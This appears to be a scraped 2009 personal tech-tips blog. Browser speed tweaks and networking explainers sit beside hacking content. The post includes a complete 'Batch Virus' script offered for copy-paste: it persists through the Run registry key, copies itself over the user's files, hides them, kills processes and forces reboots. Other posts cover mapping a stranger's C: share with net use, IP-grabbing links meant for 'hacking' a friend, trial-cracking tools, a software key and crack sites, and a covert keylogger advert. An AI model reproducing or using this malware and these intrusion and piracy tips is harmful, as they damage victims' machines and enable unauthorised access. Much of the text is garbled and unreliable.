Drive E:\The command was completed successfully.This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!
C:\>net use G: \\117.200.160.174\CThe command was completed successfully.C:\>G:G:\>
ShareThis
var AdBrite_Title_Color = '0000FF';
var AdBrite_Text_Color = '000000';
var AdBrite_Background_Color = 'FFFFFF';
var AdBrite_Border_Color = '99C9FF';
var AdBrite_URL_Color = '008000';

Wednesday, April 29, 2009

Speed Up Internet Explorer (IE) Hack

This is a compilation for the legendary Internet Explorer.. which is the most frequently used browser .







INTERNET EXPLORER Speed up STARTUP .


Isn't it annoying when you want to go to a new website, or any other site but your homepage, and you have to wait for your 'home' to load? This tweak tells Internet Explorer to simply 'run', without loading any webpages. (If you use a 'blank' page, that is still a page, and slows access. Notice the 'about:blank' in the address bar. The blank html page must still be loaded..). To load IE with 'nothing' [nothing is different than blank]:


1. Right-click on any shortcut you have to IE
[You should create a shortcut out of your desktop IE icon, and delete the original icon]
2. Click Properties
3. Add ' -nohome' [with a space before the dash] after the endquotes in the Target field.
4. Click OK
Fire up IE from your modified shortcut, and be amazed by how fast you are able to use IE!

~ cheers ~ (it works)



INTERNET EXPLORER SPEED UP.


Edit your link to start Internet Explorer to have -nohome after it. For Example: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
This will load internet explorer very fast because it does not load a webpage while it is loading. If you want to go to your homepage after it is loaded, just click on the home button.


or


Open registry editor by going to Start then >> Run and entering >> regedit.

Once in registry, navigate to key.

HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\InternetSettings. Right click @ windows right > New > DWORD.

Type MaxConnectionsPerServer > You can set value (the more higher the no, the more good speed u get, e;g : 99). [99 in hexa so 153 in binary]

Create another DWORD >type MaxConnectionsPer1_0Server. Then put a high value as mentioned above.

Restart I.E and you are done.



SPEED UP BROWSING WITH DNS trick.!!


when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:



Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d



make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Then merge it into the registry.



START Internet EXPLORER WITH EMPTY BLUE SCREEN.!!


Set your default page to about:mozilla and IE will show a nice blue screen upon startup.



FIX IE 6 SLOWDOWNS AND HANGS.


1. Open a command prompt window on the desktop (Start/Run/command).
2. Exit IE and Windows Explorer (iexplore.exe and explorer.exe, respectively, in Task Manager, i.e - Ctrl-Alt-Del/Task Manager/Processes/End Process for each).
3. Use the following command exactly from your command prompt window to delete the corrupt file:
C:\>del "%systemdrive%\Documents and Settings\%username%\Local
Settings\Temporary Internet Files\Content.IE5\index.dat"
4. Restart Windows Explorer with Task Manager (Ctrl-Alt-Del/Task Manager/Applications/New Task/Browse/C:\Windows\explorer.exe[or your path]) or Shutdown/Restart the computer from Task Manager.



SPEED UP WEB BROWSING.


Iv'e personally found a dramatic increase in web browsing after clearing the Windows XP DNS cache. To clear it type the following in a command prompt: ipconfig /flushdns.

ALLOW MORE THAN 2 SIMULTANEOUS DOWNLOADS ON IEXPLORER 6.
This is to increase the the number of max downloads to 10.
1. Start Registry Editor (Regedt32.exe).
2. Locate the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
3. On the Edit menu, click Add Value , and then add the following registry values:
"MaxConnectionsPer1_0Server"=Dword:0000000a
"MaxConnectionsPerServer"=Dword:0000000a
4. Quit Registry Editor.



IPV6 INSTALLATION FOR WINDOWS XP.


This protocol is distined to replace the Internet Protocal Version 4 used by Internet Explorer it uses hexadecimal ip addresses instead of decimal example (decimal ip 62.98.231.67) (hexadecimal IP 2001:6b8:0:400::70c)
To install To install the IPv6 Protocol for Windows XP:
Log on to the computer running Windows XP with a user account that has local administrator privileges. Open a command prompt. From the Windows XP desktop, click Start, point to Programs, point to Accessories, and then click Command Prompt. At the command prompt, type: ipv6 install
For more information on IPv6, visit the site below:
CODEhttp://www.microsoft.com/windowsxp/pro/techinfo/administration/ipv6/default.asp



ANOTHER WAY TO FIX IEXPLORER 6 SLOW PAGES LOADED.


Here's an easier way to get to index.dat file as addresse in another tweak submitted here.
1. click on Internet Explorer
2. go to to your root dir (usually C:)
3. open Documents and Settings folder
4. open "your username folder"
5. open UserData
6. **close IE if you have it open**
rename index.dat to index.old
logoff and log back on (don't need to restart) open up IE and go to a web page or site that always seemed to load slowly. It should load a lot more quickly now. NOTE. Always rename or backup .dat or other system files before deleting.


Disable Right Click!!

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001


Enable Right Click!!

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000000


do u want to save entire Page For offline viweing??


Saving Web Pages with Internet Explorer 6

Occasionally, you may want to save an entire Web page on your computer (text, hyperlinks, graphics, and all). To save the Web page that currently appears in Internet Explorer, choose File-->Save As to open the Save Web Page dialog box shown in the following figure. Select the folder in which you want the page saved and then click the Save button.
After saving a Web page on your hard drive, you can open it in Internet Explorer and view the contents even when you're not connected to the Internet. If your motive for saving the Web page, however, is to be able to view the content when you're not connected to the Internet, you're better off saving the page as a Favorite marked for offline viewing. That way, you can decide whether you want to view other pages linked to the one you're saving and you can have Internet Explorer check the site for updated content.
You can also e-mail a Web page or a link to the page to a colleague or friend. To send the current Web page in a new e-mail message, click File-->Send-->Page by E-mail on the Explorer menu bar and then fill out the new e-mail. To send a link to the page instead, click File-->Send-->Link by E-Mail. To create a desktop shortcut to the Web page, click File-->Send-->Shortcut to Desktop.




~ all of them are tested ! ~


Alternate trick

Before performing these steps you need to test your broadband speed
you can test your speed at http://www.2wire.com/
The broadband connection speed can be increased by clearing the route from modem to server. Number of packets sent by modem to server should be increased.Internet speed can be increased by increasing more number of incoming and outgoing packets.The main reason why your internet connection is slow is because of harmful virus.If your system is infected with virus your number of incomming packets will be decreased.This leads to your slower internet speed.Internet speed can be increased by by clearing the route to the server.
This can be done by upgrading costly sofwares and hardwares.This will optimize your system speed.And Increase your system speed.Internet tweak is the best software which increases your system speed for further applications.Another software Windows power tools which makes windows faster and increases your internet speed.And decreases downloading time.It optimizes LAN,CABLE,DSN etc.Another software "internet cyclone"which increases your internet speed from 64kbps to 120kbps.
This tip is designed for increased BROADBAND speed in Windows XP while using standard Network Interface cards (NIC) that are connected to ADSL modems, or when using any directly-connected USB ADSL modem.

To speed up the Internet connection speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the NIC or the USB modem.

This tip is only recommended if you have 256MB RAM or higher.

Step #1 - Identify the IRQ used by the NIC/USB modem

1. Open the System Information tool by running MSINFO32.EXE from the Run command.

2. Expand System Summary > Hardware Resources > IRQs.

3. Look for the listing made for your NIC (in my case - a Intel® PRO/100+ Management Adapter). Note the IRQ next to the specified line (in my case - IRQ21).

In case of USB modems you will first need to find the right USB device used by your modem. Follow these steps:

1. Open the Device Manager tool by running DEVMGMT.MSC from the Run command (or by right-clicking My Computer > Hardware tab > Device Manager button).

2. Scroll down to Universal Serial Bus controllers and expand it.

3. Right-click the USB Root Hub and select Properties. Note that you might need to do so for all listed USB Root hubs (if there are more than one) in order to find the right one.

4. In the Power tab, look for your USB ADSL modem.

5. In the Resources tab look for the assigned IRQ (in this case - IRQ21).

6. This is the IRQ we're looking for.

Note: IRQs and modem names might vary...

Step #2 - Modify the system.ini file

1. Run SYSEDIT.EXE from the Run command.

2. Expand the system.ini file window.

3. Scroll down almost to the end of the file till you find a line called [386enh].

4. Press Enter to make one blank line, and in that line type IRQX=4096 where X is the designated IRQ number we found in step #1, in my case it's IRQ21.

Note: This line IS CASE SENSITIVE!!!

5. Click on the File menu, then choose Save.

6. Close SYSEDIT and reboot your computer.

Done. Speed improvement will be noticed after the computer reboots.

Change Start logo in Xp

I’ve read a number of articles on the internet about changing the text on the Start button in XP. On more than one occasion I’ve seen references to a five (5) letter limitation when the button is renamed. I always wondered if this was true or just an assumption someone made because the default ‘start’ just happened to fit the button size. So, I decided to run a test and see if there really was a five character limit.

First of all just u need to do is download Resource hacker.

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

ll its just 541Kb in the size.. click here to go to the download Page


Download Resource Hacker


First Step

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 02. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry

Second Step – Modify the Registry

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the right pane (Fig. 05), double click the Shell entry to open the Edit String dialog box as shown in Fig. 06. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.


u can ofcource change the text of other Baloon Items , My Computer Name, Favourites and so on many more..

please Comment on this text if u like it

the source is shared from the internet

Batch Virus : akash

Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


------------------------------------------------------------------------------------------
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

What Is DHCP?

In simple terms, DHCP determines if your IP is static or dynamic.

DHCP is controlled by a DHCP server. Your router can be a DHCP server...and if you're on a home network, it most likely is your DHCP server.

I know this might be confusing because the word dynamic is in the term, but just because you have DHCP enabled on your computer doesn't mean you can't be assigned a static IP. DHCP enabled on your computer simply means you're letting a DHCP server assign its IP. Having it enabled DOES NOT mean it's a DHCP server.

A true DHCP server (not your Linksys router) gives the LAN Admin a ton of control with IP assigning.

Ever print to a network printer? Ever wonder how that printer keeps its network assignment? Probably through DHCP. Each network device has a MAC address. You can assign a static IP at the DHCP server to a specific MAC address. This allows the network printer to always get the same IP even after it reboots and without assigning the IP at the printer. If you print the network configuration at the printer, it will probably tell you that DHCP is enabled and no static IP is assigned. That's because the IP assignment is handled at the DHCP server.

Your ISP has a DHCP server. They can assign IPs by modem MAC addresses. When your modem comes online, it communicates to the network indicating it is looking for an IP address. The DHCP server listens to this communication and starts talking to the modem. The modem then transmits its MAC address to the DHCP server. At that point, either an IP has been reserved for the modem or one is assigned at that time. Hence cloning your MAC address to get a new IP from your ISP.

Routers and DHCP - Under the General Setup or LAN Setup tab in your router, you'll see a settings option for DHCP. You can control how many IPs are assigned or to enable/disable the DHCP server portion of the router. If you disable it, you'll have to statically assign IPs to each computer, or have a DHCP server or your network. This goes for wired and wireless. Any connection on your network has an IP address.

There's a lot more to DHCP than this, but this is a basic explanation.

Monday, April 27, 2009

How To Recover Deleted Files

If you have lost important files from your hard drive and if you are sure that they have been deleted, don’t panic! Uneraser is simple software that can help. In this tutorial, we will see how Uneraser works. On this link you can download Uneraser.
For example, I delete movie file on Local Disk (E:) , how to recover movie file?. It is simple
1. Run Uneraser , then select wizard , as shown below
2. When the wizard appears select “Do a lost files scan”, then click Next , as shown below
3. Select partition , where is deleted data, then click Next
4. Uneraser find my deleted movie
5. Now, just save your recover file, as shown below

How To Create Multiple Email Addresses In Gmail

Most of us own more than one email account , one from Gmail, one from Hotmail …Most of us are lazy and don¨t like to log in a lot of accounts It would be cool to have one email account where you can send emails from multiple addresses. Luckily, Gmail has an option to integrate multiple email accounts into a single Gmail account. ...... akash@gmail.com ...its not id just exampel
1) Log in to your gmail account and click on Settings at the top right corner.
2) Under Settings, click on Accounts tab and click on Add another email address you own, Next -> Send Verification
3> click on Add another email address you own

Get Location Of Anyone On Internet

Let’s say you want to hack your friend’s computer. Well the first and the essential thing to do (of course if you’re hacking over the Internet) is to find out his IP address. There are several methods of doing it but here’s an easy one. The only thing you have to do is to actually make your friend click a link you send him. When that person clicks the link, you will receive information like IP Address, Country, Host name, Operating System /Browser Details and region name . Just follow instructions below: 

Go to this link , here you have to type in your email address. Afterwards you’ll get a unique link that looks kinda like this one here http://acmepeers.com/?u=vyg. When someones clicks that link you will receive tracing reports to your email .

It looks like this .

SpyRemover Pro 3.05

SpyRemover detects and removes more than 140.000 intrusive devices such as spyware, adware, hijackers, keyloggers, Trojans, tracking devices, hacker tools, and other spy devices on your PC. This spyware remover is powerful and easy to use.

SpyRemover 
Website http://3d2f.com/programs/6-183-spyremover-pro-download.shtml
Download Page http://www.itcompany.com/remover.exe
File size 6172 kb
License Shareware
Operating System Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista

Free Hacking Tools

If you´re interested in hacking, you´ll need a good set of base tools with which to work. Hopefully, there are many free hacking tools online which can help you . Below you can find llist of hacking tools.
1. Date Cracker 2000
Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .If you want to known how to use Date Cracker visit my older post ” What Is Date Cracker 2000 And How To Use It ”

Date Cracker 2000 Website http://www.e-tech.ca/003-dc2000.aspDownload Page http://www.wonderworks.ca/nbia/dc20000.zipFile size 1.5 MBVideo Tutorial http://www.wonderworks.ca/nbia/dc2000.wmv

Install Flash Player without administrative permission

Let’s assume you’re at work or at school and you’re on the computer. There’s an enormous chance that you have no administrative priviliges and there’s apsolutely nothing you can install onto the computer. Let us also assume that you want to use Mozilla Firefox instead of IE. That’s an easy one, ’cause we’ve all heard of Firefox Portable. Finally you download Firefox and you’re happy how you fooled Windows. So you’re browsing and you go to youtube. And what happens? You need to install the Flash Player. Damn… What now…
1. Copy this link (http://fpdownload.macromedia.com/get/flashplayer/xpi/current/flashplayer-win.xpi) into Internet Explorer and save the file. *why to IE?.. because if you just try to download it with Firefox, everytime you try it, the automatic addon-installer will appear and that is not what we need)

Thursday, April 23, 2009

Make FREE Calls to Landline and Mobile phones

Simply type gizmocall.com/18005551212 into your browsers address bar.
(put the number you want to dial in place of 18005551212)

Make FREE calls to landline and mobile phones in over 60 countries by participating in the All Calls Free plan.

Users NEW to the All Calls Free plan get 20 minutes of free calling simply by getting ONE friend to sign up for a new Gizmo account. There are no commitments and no hidden fees.

Get Started Now!
Tell a friend to download Gizmo5 and have them add their phone number to their profile.

Add each other to your contact lists and you can call that person for FREE using Gizmo5.

Be sure to make at least 1 Gizmo5 to Gizmo5 call per week or your free minutes will expire.

Download Softwares1 poivY Rates Kuwait
2 VoipBuster Rates Thailand
3 VoipStunt Rates UK, USA
4 InternetCalls Rates Egypt, Pakistan
5 InterVoip Rates Iraq, Lebanon, Palestine, Qatar, Sudan
6 LowrateVoip Rates Bangladesh, Jordan, Indonesia, Iraq, Malaysia Thailand, UK, USA
7 FreeCall Rates Russia
8 SMSListo Rates Sudan, Syria, China
9 WebCallDirect Rates India, Pakistan, Philippines, Malaysia
10 JustVoip Rates Russia
11 12Voip Rates Bahrain, China, Sri Lanka
12 DialNow Rates Phone-to-Phone Use if you live in a FREE Call Country!.
13 nonoh Rates Phone-to-Phone Use if you live in a FREE Call Country!.
14 VoipWise Rates
15 BudgetSIP Rates We create your SIP account.
16 Calleasy Rates Phone-to-Phone Web Call
17 SIPDiscount Rates for SIP Devices
18 SMSdiscount Rates India, Morocco, Turkey
19 VoipCheap Rates
20 VoIPRaider Rates

Prevent spam in your Gmail account

Are you worried about spam in your precious gmail account ?


If yes, then you would like to consider making aliases of your gmail id to use when you’re not sure whether you’re signing up for something safe or not.

It is a very simple task to provide an alias of your gmail id. Whenever you sign up on the internet on some site that you think may not be safe (or a site which might send you spam),all you have to do is give out the email address as 
username+insertanythingyouwanthere@gmail.com

For example if your email id is james@gmail.com,you can provide james+21@gmail.com or james+test@gmail.com .You can put anything after the + and all email sent will still go to your gmail account.


In the event that you did give your email to a spammer and you start receiving spam, don’t worry! Just create a filter, and make everything that is sent to username+whateveryouputhere@gmail.com go to the trash. This way all the spam that you might get will automatically be deleted.

Gmail Account Hacking Tool

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

Wednesday, April 15, 2009

Lock and Track your Stolen Mobile Hand Set Through IMEI Number

Do you know your mobile’s IMEI number? Just press * # 0 6 # in your mobile hand set, IMEI number will be displayed in your mobile hand set.

Keep the IMEI number safely at other place. This IMEI number is unique number for each mobile hand set. In case your mobile hand set will get stolen, you can track or unlock your mobile hand set through IMEI number.

If your mobile hand set got stolen, you need to do following things.

1. Submit FIR for your mobile loss, give details of hand set model, color, IMEI number etc.

2. Ask your service provider to track the mobile phone, your mobile phone will be tracked only if the thief are using your mobile hand set with any sim card. If the thief is keeping your mobile switched off, your service provider can not track the mobile hand set location. You should not expect muck cooperation from service provider or police to locate your phone.

3. If you are unable to find your mobile number, insure that at least your mobile handset is locked. The thief can not use (misuse) your mobile with any sim card. You should ask mobile service provider to lock your mobile through IMEI number.

If the thief is smart, he/she can unblock the mobile ( IMEI Unlock ) using the latest paid software as shown here.

Monday, April 13, 2009

akash hot tips

Free new games sites

games.sinoa.com

onrpg.com

fribies.com

ga mes its100.net

wwegame.com

a2zwap.com

my-moto.ru

m obiles24.com


TOP WAP DOWNLOAD SITES

indianwap.mobi

zedge.net

mp3mob.com

mosh nokia.mobi

getjar.com

downloadwap.com


FORMAT UR COMPUTER WITH DOS MODE

GO > RUN
TYPE > CMD
TYPE > ANY DRIVE
TYPE > FORMAT DRIVE NAME

IT USING UR PC ATTAKED VIRUS SAFETY


indows Vista Key 4 all Versions:-

YFKBB PQJJV G996G VWGXY 2V3X8

block calls in vodafone+++
Just divert all voice call to
> 901
-
U hav blocked the calls in vodafone who is calling u


Do you want to use an onscreen keyboard on your pc.
simple:
Go to
start
>Run
Type osk
>enter


Frndz caution:
some other groups are asking u to dial *144*9XXXXXXXXX#
dont dial.
It ll transfer ur balance to them!!

Wana know your future?
Just download,
Kundali 5.0
also in hindi
http://rapidshare.com/files/62257901/Kundali 4.5Cracke d--www.TryFile.com.rar

Q: How To Make an Invisible Folder
A: Create a new folder & rename it as: ALT 0160
Change the icon from properties &the folder is invisible.

Useful websites for engineering students
www.sciencedirect .com
www.howstuffworks.com
books.google.com
techno logystudent.com
efunda.com


If u Lose ur Mobile,
U can report:
cop@vsnl.net
or
call
044-23452316

Free Totel language Learning
Software
Download.

http://www.byki.com


Problem for prjects?
School and college projects
Readymade available here
just print out and submit

http://www.scribd.com

mobile trick

Free Softwr site:
Mobile:
xchanger.mobi
wapshare.com
wap2.org

PC:
www.mobile9.com
www.mobiles24.com

EST mp3 sites:

bollyextreme.com

123musiq.com

apunkaboll ywood.com

wapdhamaka.com

apnamobi.net

desifunda .net
~
Find a Crack for all Trial Version Softwares:

www.keygen.uk
www.serials.ws
www.crack zplanet.com
crackfind.com


Have u lost ur mobile,
and u wnt to find
where its?
Just visit-

http://mgismobile.com
&register ur mobile no.
www.netdisaster.com


Create ur own blog 4 free
>www.blog.com
>www.blogger.com
>www.blogster. com
>www.netcipia.com
>www.blogr.com


Start Motorolo FM without headphone
only dial
*#**372#
or
*#**376#


China mobile secret codes

*#110*01#
*#987#
*#800#
*#0000#
*#001#
*#08 86#
*#0966#

Free calling Site
www.vivophone.com
www.tokiva.com
www.mobi vox.com
www.rebtel.com
www.iamvoip.com
www.jaxtr.c om
www.mig33.com


TOLL FREE NUMBERS
NokiaCare >18004253388
Samsung>
1800110011
Sony erricson>
1800111800


R u a cricket lover?
Want 2b informed with latest scores?
Dan visit
cricbuzz.com
cricketnirvana.com
cricketnext. in
vcricket.com
cricinfo.co

Use this Trick To
RESTART ur Frends Mobile
(1110,1110i,1112,1100,2100)
via SMS.
Just Type 79 inverted comma like This,,,,,,,,,,,,,
& send.


Rotate Nokia phone screen-
dial

*#5511#
*#5512#
*#5513#
*#5514#

WOR KING IN NOKIA
1600,1650,1200,1208

Saturday, April 11, 2009

Break Your Firewall And Proxy Rules

Break your Firewall And Proxy Rules

Written By akash b
mar 5 2004
9

This tutorial will explain

1). How to use Yahoo Messenger blocked by firewall or proxy.
2). How to use MSN Messenger blocked by firewall or proxy.
3). How to use IRC blocked by firewall or proxy.
4). How to use FTP blocked by firewall or proxy.
5). How to use ICQ blocked by firewall or proxy.
6). How to use Telnet blocked by firewall or proxy.
7). How to use P2P software like Kazza, Edonkey blocked by firewall or proxy.
8). Other applications which cannot use proxy.

Most of the companies allow only website surfing (i.e. port 80), but they restrict all other ports so the employees cannot accesses Messengers P2P ftp server etc. But there are some ways out for breaking these rules set at your firewall or proxy server. One of the ways is to use HTTP Tunneling technique.

What is HTTP TUNNELING?

“Tunneling” sounds good. The method which we are going to use is almost similar to the literal meaning of Tunneling.

Normal scenario
Take an example using an FTP service.
When you connect to an FTP site using an FTP client packet request will be as below

Source IP : your IP address
Source Port : your computer port
Destination IP : 205.*.*.1 (ftp server you are trying to connect)
Destination Port : 21
DATA : Get file File.zip

Let us think there is a firewall in your network. Administrator of your network might have blocked port 21 (normally all outing ports are blocked other than port 80). So now you cannot accesses FTP server 205.*.*.1.Think if this is the scenario is there any way to bypass your firewall rule?

Yes you can do it.
Why can’t we put up a middleman which can accept all your port 80 request and translate it to port 21 request then send it to your FTP server i.e. 205.*.*.1. Now you are asking the middleman server which you have installed outside the company to connect to FTP server 205.*.*.1 on port 21 and get the file you required, send it back it to you. This is HTTP Tunneling.

Now the packet you are sending will be like below

Source IP : your IP address
Source Port : your computer port
Destination IP : Middleman Server IP
Destination Port : 80
DATA : Connect to 205.*.*.1 using port 21 and get file File.zip and send it to your IP

If the firewall captures this packet it will think that it is a port 80 request for the middleman server. So it is a genuine request and it will allow it to pass through.

So for doing it you need a two components one client and a server module. Install client module inside your company. Install server module (middleman) outside company it can be your personal PC at your home. Configure your softwares i.e. your Yahoo messenger or IRC to communicate to your client software installed. Client software will convert your request in HTTP format and send it to middleman server. Middleman server i.e. your home PC is basically a web server with a twist. When client is doing tunneling, it sends series of HTTP requests to the server. Your company firewall sees as if you were surfing to some web site, and consciously allows you. Server module i.e. your PC in turn performs it's half of tunneling and talks to the target servers.

I am attaching a figure with this Tutorial.

You can get the tunneling software from links below

http://www.http-tunnel.com
http://www.htthost.com/
http://www.nocrew.org/software/httptunnel.html
http://www.codeguru.com/Cpp/I-N/internet/h...icle.php/c6209/
http://www.totalrc.net/s2h/index.jsp

This is the modified version of my previous post

Outlook and Outlook Express Password Recovery

Outlook and Outlook Express Password Recovery
Download Download
Screenshot Screenshot
Buy now Buy now

Outlook and Outlook Express Password Recovery

Outlook and Outlook Express Password Recovery Software is specifically designed to retrieve users forgotten or lost password list for multiple email accounts configured on Microsoft Outlook and Outlook express mail servers. Customized Outlook password rescue tool provides efficient recovery of misplaced and forgotten password of email, newsgroup accounts along with identity passwords in few seconds supporting multilingual password characters. Offers highly secure and effective password recovery service which easily unmasks passwords stored behind asterisks (****) characters with the help of drag and drop lens technology.

Professionally developed password rescue solution for Outlook Express supports all major versions of MS Outlook and Outlook Express and offers best performance and quickest recovery of most complex combinational passwords. Outlook express password unmasking software is easy operating tool, even for the users who does not have any technical background. Download free trial version of password recovery software to reset your lost email id password list. Advanced password retrieval utility supports all major Windows operating system, including 98, NT, 2000, XP, 2003, VISTA.

Advance KeyLogger

Advance KeyLogger
Download Download
Screenshot Screenshot
Buy now Buy now

Advance KeyLogger

Advanced Keylogger is world best user-activity monitoring software that secretly records each typed keystrokes and all internet activities performed by external users on your computer system. Powerful invisible surveillance tool retrieves all website related information including email passwords, typed URL’s, online chat activities, instant messages etc. in hidden encrypted log file with advance feature to capture windows screenshots periodically at regular interval of time on your computer system. Best monitoring tool provides complete information of various tasks performed on system including time and date of each session created, login session details and total keys pressed in the current session.

Professionally developed keyboard tracker system works completely undetected by users since it stays hidden from add/remove program list, startup menu and even from installation files and folders which prevents external users to modify the software settings. Advanced Keystroke logger combines powerful monitoring features with extreme ease of use interface for home users, business, government agencies and more.

Incoming and Outgoing Mail Server Settings for Hotmail, Yahoo! Mail, GMail, AOL and more

*Update, 29th of August 2006: the Google Gmail service offers a SMTP server (outgoing mail server) for Gmail accounts. To use the Google Gmail SMTP server, use the following information:

    Google Gmail Outgoing Mail Server (SMTP): smtp.gmail.com
    The Gmail SMTP server requires authentication (use the same settings as for the incoming mail server)
    The Google Gmail SMTP Server requires an encrypted connection (SSL) on port 465.

dots Why & when do I need these settings?

Hotmail, Yahoo! Mail, GMail and other providers are basically email services designed to provide you with email mailbox accesss directly from the web. However, going online and logging on to their sites is not always the most convenient way for reading and sending emails.

On the other hand, you have the alternative to send and receive emails through such a mailbox by using a local email client software, such as Outlook Express, Microsoft Outlook, Thunderbird, Thunderbird, etc. In order to properly use it, you need to configure your email software with the incoming and outgoing mail servers of your email provider (Hotmail, Gmail, Yahoo! Mail or else).

dots Mail Server Settings

  • Hotmail Settings

  • As other web based email services, Hotmail is using the HTTP protocol for connecting you to your mailbox. If you want to send and receive Hotmail emails using an email client software, then your software must support Hotmail HTTP access for your email account. Some email clients, such as Outlook Express or Microsoft Outlook, offer builtin support for Hotmail accounts, so you only have to select HTTP when you are asked to select your email account type and select Hotmail as the HTTP Mail Service Provider.

  • Yahoo! Mail Settings

  • Unlike Hotmail, Yahoo! Mail offers standard POP3 access for receiving emails incoming through your Yahoo mailbox, by using your favorite email client software. To setup your email client for working with your Yahoo account, you need to select the POP3 protocol and use the following mail server settings:
      Yahoo Incoming Mail Server (POP3) - pop.mail.yahoo.com (port 110)
      Yahoo Outgoing Mail Server (SMTP) - smtp.mail.yahoo.com (port 25)
